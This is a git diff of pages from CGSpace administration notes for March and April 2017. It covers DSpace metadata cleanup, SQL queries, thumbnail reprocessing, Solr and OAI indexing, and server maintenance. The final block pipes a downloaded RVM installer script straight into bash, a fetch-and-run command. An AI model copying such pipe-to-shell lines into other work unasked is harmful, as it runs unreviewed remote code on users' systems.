<li>And a comment from Atmire&rsquo;s Bram about it on the DSpace wiki: <a href="https://wiki.lyrasis.org/display/DSDOC5x/Installing+DSpace?focusedCommentId=78163296#comment-78163296">https://wiki.lyrasis.org/display/DSDOC5x/Installing+DSpace?focusedCommentId=78163296#comment-78163296</a></li>
<li>Bram mentions an undocumented configuration option <code>handle.plugin.checknameauthority</code>, but I noticed another one in <code>dspace.cfg</code>:</li>
</ul>
<pre><code># List any additional prefixes that need to be managed by this handle server
<pre tabindex="0"><code># List any additional prefixes that need to be managed by this handle server
# (as for examle handle prefix coming from old dspace repository merged in
# that repository)
# handle.additional.prefixes = prefix1[, prefix2]
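# for example, if an old repository prefix (say the CGIAR Library prefix 10947) were
# merged into this one, the setting might look like this (an illustration, not our config):
# handle.additional.prefixes = 10947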
@ -212,23 +212,23 @@ DirectClass sRGB Alpha
<li>Because of this I noticed that our Handle server&rsquo;s <code>config.dct</code> was potentially misconfigured!</li>
<li>We had some default values still present:</li>
</ul>
<pre><code>&quot;300:0.NA/YOUR_NAMING_AUTHORITY&quot;
<pre tabindex="0"><code>&#34;300:0.NA/YOUR_NAMING_AUTHORITY&#34;
</code></pre><ul>
<li>I&rsquo;ve changed them to the following and restarted the handle server:</li>
</ul>
<pre><code>&quot;300:0.NA/10568&quot;
<pre tabindex="0"><code>&#34;300:0.NA/10568&#34;
</code></pre><ul>
<li>In looking at all the configs I just noticed that we are not providing a DOI in the Google-specific metadata crosswalk</li>
<li>From <code>dspace/config/crosswalks/google-metadata.properties</code>:</li>
</ul>
<pre><code>google.citation_doi = cg.identifier.doi
<pre tabindex="0"><code>google.citation_doi = cg.identifier.doi
</code></pre><ul>
<li>This works, and makes DSpace output the following metadata on the item view page:</li>
</ul>
<pre><code>&lt;meta content=&quot;https://dx.doi.org/10.1186/s13059-017-1153-y&quot; name=&quot;citation_doi&quot;&gt;
<pre tabindex="0"><code>&lt;meta content=&#34;https://dx.doi.org/10.1186/s13059-017-1153-y&#34; name=&#34;citation_doi&#34;&gt;
</code></pre><ul>
<li>Submitted and merged pull request for this: <a href="https://github.com/ilri/DSpace/pull/305">https://github.com/ilri/DSpace/pull/305</a></li>
<li>Submit pull request to set the author separator for XMLUI item lists to a semicolon instead of &ldquo;,&quot;: <a href="https://github.com/ilri/DSpace/pull/306">https://github.com/ilri/DSpace/pull/306</a></li>
<li>Submit pull request to set the author separator for XMLUI item lists to a semicolon instead of &ldquo;,&rdquo;: <a href="https://github.com/ilri/DSpace/pull/306">https://github.com/ilri/DSpace/pull/306</a></li>
<li>I want to show it briefly to Abenet and Peter to get feedback</li>
</ul>
<h2 id="2017-03-06">2017-03-06</h2>
@ -260,18 +260,18 @@ DirectClass sRGB Alpha
<ul>
<li>Export list of sponsors so Peter can clean it up:</li>
</ul>
<pre><code>dspace=# \copy (select text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'description' and qualifier = 'sponsorship') group by text_value order by count desc) to /tmp/sponsorship.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;description&#39; and qualifier = &#39;sponsorship&#39;) group by text_value order by count desc) to /tmp/sponsorship.csv with csv;
COPY 285
</code></pre><h2 id="2017-03-12">2017-03-12</h2>
<ul>
<li>Test the sponsorship fixes and deletes from Peter:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i Investors-Fix-51.csv -f dc.description.sponsorship -t Action -m 29 -d dspace -u dspace -p fuuuu
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Investors-Fix-51.csv -f dc.description.sponsorship -t Action -m 29 -d dspace -u dspace -p fuuuu
$ ./delete-metadata-values.py -i Investors-Delete-121.csv -f dc.description.sponsorship -m 29 -d dspace -u dspace -p fuuu
</code></pre><ul>
<li>Generate a new list of unique sponsors so we can update the controlled vocabulary:</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'description' and qualifier = 'sponsorship')) to /tmp/sponsorship.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = &#39;description&#39; and qualifier = &#39;sponsorship&#39;)) to /tmp/sponsorship.csv with csv;
</code></pre><ul>
<li>Pull request for controlled vocabulary if Peter approves: <a href="https://github.com/ilri/DSpace/pull/308">https://github.com/ilri/DSpace/pull/308</a></li>
<li>Review Sisay&rsquo;s roots, tubers, and bananas (RTB) theme, which still needs some fixes to work properly: <a href="https://github.com/ilri/DSpace/pull/307">https://github.com/ilri/DSpace/pull/307</a></li>
@ -311,12 +311,12 @@ $ ./delete-metadata-values.py -i Investors-Delete-121.csv -f dc.description.spon
<ul>
<li>CCAFS said they are ready for the flagship updates for Phase II to be run (<code>cg.subject.ccafs</code>), so I ran them on CGSpace:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i ccafs-flagships-feb7.csv -f cg.subject.ccafs -t correct -m 210 -d dspace -u dspace -p fuuu
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i ccafs-flagships-feb7.csv -f cg.subject.ccafs -t correct -m 210 -d dspace -u dspace -p fuuu
</code></pre><ul>
<li>We&rsquo;ve been waiting since February to run these</li>
<li>Also, I generated a list of all CCAFS flagships because there are a dozen or so more than there should be:</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=210 group by text_value order by count desc) to /tmp/ccafs.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=210 group by text_value order by count desc) to /tmp/ccafs.csv with csv;
</code></pre><ul>
<li>I sent a list to CCAFS people so they can tell me if some should be deleted or moved, etc</li>
<li>Test, squash, and merge Sisay&rsquo;s RTB theme into <code>5_x-prod</code>: <a href="https://github.com/ilri/DSpace/pull/316">https://github.com/ilri/DSpace/pull/316</a></li>
@ -325,11 +325,11 @@ $ ./delete-metadata-values.py -i Investors-Delete-121.csv -f dc.description.spon
<ul>
<li>Dump a list of fields in the DC and CG schemas to compare with CG Core:</li>
</ul>
<pre><code>dspace=# select case when metadata_schema_id=1 then 'dc' else 'cg' end as schema, element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id in (1, 2);
<pre tabindex="0"><code>dspace=# select case when metadata_schema_id=1 then &#39;dc&#39; else &#39;cg&#39; end as schema, element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id in (1, 2);
</code></pre><ul>
<li>Ooh, a better one!</li>
</ul>
<pre><code>dspace=# select coalesce(case when metadata_schema_id=1 then 'dc.' else 'cg.' end) || concat_ws('.', element, qualifier) as field, scope_note from metadatafieldregistry where metadata_schema_id in (1, 2);
<pre tabindex="0"><code>dspace=# select coalesce(case when metadata_schema_id=1 then &#39;dc.&#39; else &#39;cg.&#39; end) || concat_ws(&#39;.&#39;, element, qualifier) as field, scope_note from metadatafieldregistry where metadata_schema_id in (1, 2);
</code></pre><h2 id="2017-03-30">2017-03-30</h2>
<ul>
<li>Adjust the Linode CPU usage alerts for the CGSpace server from 150% to 200%, as generally the nightly Solr indexing causes a usage around 150–190%, so this should make the alerts less regular</li>
@ -355,15 +355,15 @@ $ ./delete-metadata-values.py -i Investors-Delete-121.csv -f dc.description.spon
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -17,7 +17,7 @@ Quick proof-of-concept hack to add dc.rights to the input form, including some i
Remove redundant/duplicate text in the DSpace submission license
Testing the CMYK patch on a collection with 650 items:
$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &quot;ImageMagick PDF Thumbnail&quot; -v &gt;&amp; /tmp/filter-media-cmyk.txt
$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&amp; /tmp/filter-media-cmyk.txt
" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2017-04/" />
@ -38,9 +38,9 @@ Quick proof-of-concept hack to add dc.rights to the input form, including some i
Remove redundant/duplicate text in the DSpace submission license
Testing the CMYK patch on a collection with 650 items:
$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &quot;ImageMagick PDF Thumbnail&quot; -v &gt;&amp; /tmp/filter-media-cmyk.txt
$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&amp; /tmp/filter-media-cmyk.txt
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -70,12 +70,12 @@ $ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &quot;ImageMagick PDF Th
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -122,7 +122,7 @@ $ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &quot;ImageMagick PDF Th
<time datetime="2017-04-02T17:08:52+02:00">Sun Apr 02, 2017</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -136,16 +136,16 @@ $ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &quot;ImageMagick PDF Th
<li>Remove redundant/duplicate text in the DSpace submission license</li>
<li>Testing the CMYK patch on a collection with 650 items:</li>
</ul>
<pre><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &quot;ImageMagick PDF Thumbnail&quot; -v &gt;&amp; /tmp/filter-media-cmyk.txt
<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&amp; /tmp/filter-media-cmyk.txt
</code></pre><h2 id="2017-04-03">2017-04-03</h2>
<ul>
<li>Continue testing the CMYK patch on more communities:</li>
</ul>
<pre><code>$ [dspace]/bin/dspace filter-media -f -i 10568/1 -p &quot;ImageMagick PDF Thumbnail&quot; -v &gt;&gt; /tmp/filter-media-cmyk.txt 2&gt;&amp;1
<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/1 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&gt; /tmp/filter-media-cmyk.txt 2&gt;&amp;1
</code></pre><ul>
<li>So far there are almost 500:</li>
</ul>
<pre><code>$ grep -c profile /tmp/filter-media-cmyk.txt
<pre tabindex="0"><code>$ grep -c profile /tmp/filter-media-cmyk.txt
484
</code></pre><ul>
<li>Looking at the CG Core document again, I&rsquo;ll send some feedback to Peter and Abenet:
@ -157,39 +157,39 @@ $ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &quot;ImageMagick PDF Th
</li>
<li>Also, I&rsquo;m noticing some weird outliers in <code>cg.coverage.region</code>, need to remember to go correct these later:</li>
</ul>
<pre><code>dspace=# select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=227;
<pre tabindex="0"><code>dspace=# select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=227;
</code></pre><h2 id="2017-04-04">2017-04-04</h2>
<ul>
<li>The <code>filter-media</code> script has been running on more large communities and now there are many more CMYK PDFs that have been fixed:</li>
</ul>
<pre><code>$ grep -c profile /tmp/filter-media-cmyk.txt
<pre tabindex="0"><code>$ grep -c profile /tmp/filter-media-cmyk.txt
1584
</code></pre><ul>
<li>Trying to find a way to get the number of items submitted by a certain user in 2016</li>
<li>It&rsquo;s not possible in the DSpace search / module interfaces, but it might be possible to derive it from <code>dc.description.provenance</code>, as that field contains the name and email of the submitter/approver, i.e.:</li>
</ul>
<pre><code>Submitted by Francesca Giampieri (fgiampieri) on 2016-01-19T13:56:43Z^M
<pre tabindex="0"><code>Submitted by Francesca Giampieri (fgiampieri) on 2016-01-19T13:56:43Z^M
No. of bitstreams: 1^M
ILAC_Brief21_PMCA.pdf: 113462 bytes, checksum: 249fef468f401c066a119f5db687add0 (MD5)
</code></pre><ul>
<li>This SQL query returns fields that were submitted or approved by giampieri in 2016 and contain a &ldquo;checksum&rdquo; (ie, there was a bitstream in the submission):</li>
</ul>
<pre><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^(Submitted|Approved).*giampieri.*2016-.*checksum.*';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ &#39;^(Submitted|Approved).*giampieri.*2016-.*checksum.*&#39;;
</code></pre><ul>
<li>Then this one does the same, but for fields that don&rsquo;t contain checksums (ie, there was no bitstream in the submission):</li>
</ul>
<pre><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^(Submitted|Approved).*giampieri.*2016-.*' and text_value !~ '^(Submitted|Approved).*giampieri.*2016-.*checksum.*';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ &#39;^(Submitted|Approved).*giampieri.*2016-.*&#39; and text_value !~ &#39;^(Submitted|Approved).*giampieri.*2016-.*checksum.*&#39;;
</code></pre><ul>
<li>For some reason there seem to be way too many fields, for example there are 498 + 13 here, which is 511 items for just this one user.</li>
<li>It looks like there can be a scenario where the user submitted AND approved it, so some records might be doubled&hellip;</li>
<li>In that case it might just be better to see how many the user submitted (both <em>with</em> and <em>without</em> bitstreams):</li>
</ul>
<pre><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^Submitted.*giampieri.*2016-.*';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ &#39;^Submitted.*giampieri.*2016-.*&#39;;
</code></pre><h2 id="2017-04-05">2017-04-05</h2>
<ul>
<li>After doing a few more large communities it seems this is the final count of CMYK PDFs:</li>
</ul>
<pre><code>$ grep -c profile /tmp/filter-media-cmyk.txt
<pre tabindex="0"><code>$ grep -c profile /tmp/filter-media-cmyk.txt
2505
</code></pre><h2 id="2017-04-06">2017-04-06</h2>
<ul>
@ -260,7 +260,7 @@ ILAC_Brief21_PMCA.pdf: 113462 bytes, checksum: 249fef468f401c066a119f5db687add0
<li>I will have to check the OAI cron scripts on DSpace Test, and then run them on CGSpace</li>
<li>Running <code>dspace oai import</code> and <code>dspace oai clean-cache</code> have zero effect, but this seems to rebuild the cache from scratch:</li>
</ul>
<pre><code>$ /home/dspacetest.cgiar.org/bin/dspace oai import -c
<pre tabindex="0"><code>$ /home/dspacetest.cgiar.org/bin/dspace oai import -c
...
63900 items imported so far...
64000 items imported so far...
@ -273,7 +273,7 @@ OAI 2.0 manager action ended. It took 829 seconds.
<li>The import command should theoretically catch situations like this where an item&rsquo;s metadata was updated, but in this case we changed the metadata schema and it doesn&rsquo;t seem to catch it (could be a bug!)</li>
<li>Attempting a full rebuild of OAI on CGSpace:</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace oai import -c
...
58700 items imported so far...
@ -326,14 +326,14 @@ sys 1m29.310s
<li>One thing we need to remember if we start using OAI is to enable the autostart of the harvester process (see <code>harvester.autoStart</code> in <code>dspace/config/modules/oai.cfg</code>)</li>
<li>Error when running DSpace cleanup task on DSpace Test and CGSpace (on the same item), I need to look this up:</li>
</ul>
<pre><code>Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(435) is still referenced from table &quot;bundle&quot;.
<pre tabindex="0"><code>Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(435) is still referenced from table &#34;bundle&#34;.
</code></pre><h2 id="2017-04-18">2017-04-18</h2>
<ul>
<li>Helping Tsega test his new <a href="https://github.com/ilri/ckm-cgspace-rest-api">CGSpace REST API Rails app</a> on DSpace Test</li>
<li>Setup and run with:</li>
</ul>
<pre><code>$ git clone https://github.com/ilri/ckm-cgspace-rest-api.git
<pre tabindex="0"><code>$ git clone https://github.com/ilri/ckm-cgspace-rest-api.git
$ cd ckm-cgspace-rest-api/app
$ gem install bundler
$ bundle
@ -342,12 +342,12 @@ $ rails -s
</code></pre><ul>
<li>I used Ansible to create a PostgreSQL user that only has <code>SELECT</code> privileges on the tables it needs:</li>
</ul>
<pre><code>$ ansible linode02 -u aorth -b --become-user=postgres -K -m postgresql_user -a 'db=database name=username password=password priv=CONNECT/item:SELECT/metadatavalue:SELECT/metadatafieldregistry:SELECT/metadataschemaregistry:SELECT/collection:SELECT/handle:SELECT/bundle2bitstream:SELECT/bitstream:SELECT/bundle:SELECT/item2bundle:SELECT state=present'
<pre tabindex="0"><code>$ ansible linode02 -u aorth -b --become-user=postgres -K -m postgresql_user -a &#39;db=database name=username password=password priv=CONNECT/item:SELECT/metadatavalue:SELECT/metadatafieldregistry:SELECT/metadataschemaregistry:SELECT/collection:SELECT/handle:SELECT/bundle2bitstream:SELECT/bitstream:SELECT/bundle:SELECT/item2bundle:SELECT state=present&#39;
</code></pre><ul>
<li>Need to look into <a href="https://github.com/puma/puma/blob/master/docs/systemd.md">running this via systemd</a></li>
<li>This is interesting for creating runnable commands from <code>bundle</code>:</li>
</ul>
<pre><code>$ bundle binstubs puma --path ./sbin
<pre tabindex="0"><code>$ bundle binstubs puma --path ./sbin
</code></pre><h2 id="2017-04-19">2017-04-19</h2>
<ul>
<li>Usman sent another link to their OAI interface, where the country names are now capitalized: <a href="https://data.cifor.org/dspace/oai/cgiar?verb=GetRecord&amp;metadataPrefix=dim&amp;identifier=oai:data.cifor.org:11463/947">https://data.cifor.org/dspace/oai/cgiar?verb=GetRecord&amp;metadataPrefix=dim&amp;identifier=oai:data.cifor.org:11463/947</a></li>
@ -360,15 +360,15 @@ $ rails -s
<li>Looking at 933 CIAT records from Sisay, he&rsquo;s having problems creating a SAF bundle to import to DSpace Test</li>
<li>I started by looking at his CSV in OpenRefine, and I see there a <em>bunch</em> of fields with whitespace issues that I cleaned up:</li>
</ul>
<pre><code>value.replace(&quot; ||&quot;,&quot;||&quot;).replace(&quot;|| &quot;,&quot;||&quot;).replace(&quot; || &quot;,&quot;||&quot;)
<pre tabindex="0"><code>value.replace(&#34; ||&#34;,&#34;||&#34;).replace(&#34;|| &#34;,&#34;||&#34;).replace(&#34; || &#34;,&#34;||&#34;)
</code></pre><ul>
<li>Also, all the filenames have spaces and URL encoded characters in them, so I decoded them from URL encoding:</li>
</ul>
<pre><code>unescape(value,&quot;url&quot;)
<pre tabindex="0"><code>unescape(value,&#34;url&#34;)
</code></pre><ul>
<li>Then create the filename column using the following transform from URL:</li>
</ul>
<pre><code>value.split('/')[-1].replace(/#.*$/,&quot;&quot;)
<pre tabindex="0"><code>value.split(&#39;/&#39;)[-1].replace(/#.*$/,&#34;&#34;)
</code></pre><ul>
<li>The <code>replace</code> part is because some URLs have an anchor like <code>#page=14</code> which we obviously don&rsquo;t want on the filename</li>
<li>Also, we need to only use the PDF on the item corresponding with page 1, so we don&rsquo;t end up with literally hundreds of duplicate PDFs</li>
@ -381,7 +381,7 @@ $ rails -s
<li>Looking at the CIAT data again, a bunch of items have metadata values ending in <code>||</code>, which might cause blank fields to be added at import time</li>
<li>Cleaning them up with OpenRefine:</li>
</ul>
<pre><code>value.replace(/\|\|$/,&quot;&quot;)
<pre tabindex="0"><code>value.replace(/\|\|$/,&#34;&#34;)
</code></pre><ul>
<li>Working with the CIAT data in OpenRefine to remove the filename column from all but the first item which requires a particular PDF, as there are many items pointing to the same PDF, which would cause hundreds of duplicates to be added if we included them in the SAF bundle</li>
<li>I did some massaging in OpenRefine, flagging duplicates with stars and flags, then filtering and removing the filenames of those items</li>
@ -391,15 +391,15 @@ $ rails -s
<li>Also there are loads of whitespace errors in almost every field, so I trimmed leading/trailing whitespace</li>
<li>Unbelievable, there are also metadata values like:</li>
</ul>
<pre><code>COLLETOTRICHUM LINDEMUTHIANUM|| FUSARIUM||GERMPLASM
<pre tabindex="0"><code>COLLETOTRICHUM LINDEMUTHIANUM|| FUSARIUM||GERMPLASM
</code></pre><ul>
<li>Add a description to the file names using:</li>
</ul>
<pre><code>value + &quot;__description:&quot; + cells[&quot;dc.type&quot;].value
<pre tabindex="0"><code>value + &#34;__description:&#34; + cells[&#34;dc.type&#34;].value
</code></pre><ul>
<li>Test import of 933 records:</li>
</ul>
<pre><code>$ [dspace]/bin/dspace import -a -e aorth@mjanja.ch -c 10568/87193 -s /home/aorth/src/CIAT-Books/SimpleArchiveFormat/ -m /tmp/ciat
<pre tabindex="0"><code>$ [dspace]/bin/dspace import -a -e aorth@mjanja.ch -c 10568/87193 -s /home/aorth/src/CIAT-Books/SimpleArchiveFormat/ -m /tmp/ciat
$ wc -l /tmp/ciat
933 /tmp/ciat
</code></pre><ul>
@ -409,21 +409,21 @@ $ wc -l /tmp/ciat
<li>More work on Ansible infrastructure stuff for Tsega&rsquo;s CKM DSpace REST API</li>
<li>I&rsquo;m going to start re-processing all the PDF thumbnails on CGSpace, one community at a time:</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace filter-media -f -v -i 10568/71249 -p &quot;ImageMagick PDF Thumbnail&quot; -v &gt;&amp; /tmp/filter-media-cmyk.txt
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace filter-media -f -v -i 10568/71249 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&amp; /tmp/filter-media-cmyk.txt
</code></pre><h2 id="2017-04-22">2017-04-22</h2>
<ul>
<li>Someone on the dspace-tech mailing list responded with a suggestion about the foreign key violation in the <code>cleanup</code> task</li>
<li>The solution is to remove the ID (ie set to NULL) from the <code>primary_bitstream_id</code> column in the <code>bundle</code> table</li>
<li>After doing that and running the <code>cleanup</code> task again I find more bitstreams that are affected and end up with a long list of IDs that need to be fixed:</li>
</ul>
<pre><code>dspace=# update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (435, 1136, 1132, 1220, 1236, 3002, 3255, 5322);
<pre tabindex="0"><code>dspace=# update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (435, 1136, 1132, 1220, 1236, 3002, 3255, 5322);
</code></pre><h2 id="2017-04-24">2017-04-24</h2>
<ul>
<li>Two users mentioned some items they recently approved not showing up in the search / XMLUI</li>
<li>I looked at the logs from yesterday and it seems the Discovery indexing has been crashing:</li>
</ul>
<pre><code>2017-04-24 00:00:15,578 INFO com.atmire.dspace.discovery.AtmireSolrService @ Processing (55 of 58853): 70590
<pre tabindex="0"><code>2017-04-24 00:00:15,578 INFO com.atmire.dspace.discovery.AtmireSolrService @ Processing (55 of 58853): 70590
2017-04-24 00:00:15,586 INFO com.atmire.dspace.discovery.AtmireSolrService @ Processing (56 of 58853): 74507
2017-04-24 00:00:15,614 ERROR com.atmire.dspace.discovery.AtmireSolrService @ this IndexWriter is closed
org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: this IndexWriter is closed
@ -447,7 +447,7 @@ org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: this Index
</code></pre><ul>
<li>Looking at the past few days of logs, it looks like the indexing process started crashing on 2017-04-20:</li>
</ul>
<pre><code># grep -c 'IndexWriter is closed' [dspace]/log/dspace.log.2017-04-*
<pre tabindex="0"><code># grep -c &#39;IndexWriter is closed&#39; [dspace]/log/dspace.log.2017-04-*
[dspace]/log/dspace.log.2017-04-01:0
[dspace]/log/dspace.log.2017-04-02:0
[dspace]/log/dspace.log.2017-04-03:0
@ -475,12 +475,12 @@ org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: this Index
</code></pre><ul>
<li>I restarted Tomcat and re-ran the discovery process manually:</li>
</ul>
<pre><code>[dspace]/bin/dspace index-discovery
<pre tabindex="0"><code>[dspace]/bin/dspace index-discovery
</code></pre><ul>
<li>Now everything is ok</li>
<li>Finally finished manually running the cleanup task over and over and null&rsquo;ing the conflicting IDs:</li>
</ul>
<pre><code>dspace=# update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (435, 1132, 1136, 1220, 1236, 3002, 3255, 5322, 5098, 5982, 5897, 6245, 6184, 4927, 6070, 4925, 6888, 7368, 7136, 7294, 7698, 7864, 10799, 10839, 11765, 13241, 13634, 13642, 14127, 14146, 15582, 16116, 16254, 17136, 17486, 17824, 18098, 22091, 22149, 22206, 22449, 22548, 22559, 22454, 22253, 22553, 22897, 22941, 30262, 33657, 39796, 46943, 56561, 58237, 58739, 58734, 62020, 62535, 64149, 64672, 66988, 66919, 76005, 79780, 78545, 81078, 83620, 84492, 92513, 93915);
<pre tabindex="0"><code>dspace=# update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (435, 1132, 1136, 1220, 1236, 3002, 3255, 5322, 5098, 5982, 5897, 6245, 6184, 4927, 6070, 4925, 6888, 7368, 7136, 7294, 7698, 7864, 10799, 10839, 11765, 13241, 13634, 13642, 14127, 14146, 15582, 16116, 16254, 17136, 17486, 17824, 18098, 22091, 22149, 22206, 22449, 22548, 22559, 22454, 22253, 22553, 22897, 22941, 30262, 33657, 39796, 46943, 56561, 58237, 58739, 58734, 62020, 62535, 64149, 64672, 66988, 66919, 76005, 79780, 78545, 81078, 83620, 84492, 92513, 93915);
</code></pre><ul>
<li>Now running the cleanup script on DSpace Test and already seeing 11GB freed from the assetstore—it&rsquo;s likely we haven&rsquo;t had a cleanup task complete successfully in years&hellip;</li>
</ul>
@ -489,12 +489,12 @@ org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: this Index
<li>Finally finished running the PDF thumbnail re-processing on CGSpace, the final count of CMYK PDFs is about 2751</li>
<li>Preparing to run the cleanup task on CGSpace, I want to see how many files are in the assetstore:</li>
</ul>
<pre><code># find [dspace]/assetstore/ -type f | wc -l
<pre tabindex="0"><code># find [dspace]/assetstore/ -type f | wc -l
113104
</code></pre><ul>
<li>Troubleshooting the Atmire Solr update process that runs at 3:00 AM every morning, after finishing at 100% it has this error:</li>
</ul>
<pre><code>[=================================================&gt; ]99% time remaining: 0 seconds. timestamp: 2017-04-25 09:07:12
<pre tabindex="0"><code>[=================================================&gt; ]99% time remaining: 0 seconds. timestamp: 2017-04-25 09:07:12
[=================================================&gt; ]99% time remaining: 0 seconds. timestamp: 2017-04-25 09:07:12
[=================================================&gt; ]99% time remaining: 0 seconds. timestamp: 2017-04-25 09:07:12
[=================================================&gt; ]99% time remaining: 0 seconds. timestamp: 2017-04-25 09:07:13
@ -557,7 +557,7 @@ Caused by: java.lang.ClassNotFoundException: org.dspace.statistics.content.DSpac
<li>The size of the CGSpace database dump went from 111MB to 96MB, not sure about actual database size though</li>
<li>Update RVM&rsquo;s Ruby from 2.3.0 to 2.4.0 on DSpace Test:</li>
</ul>
<pre><code>$ gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
<pre tabindex="0"><code>$ gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
$ \curl -sSL https://raw.githubusercontent.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash -s stable --ruby
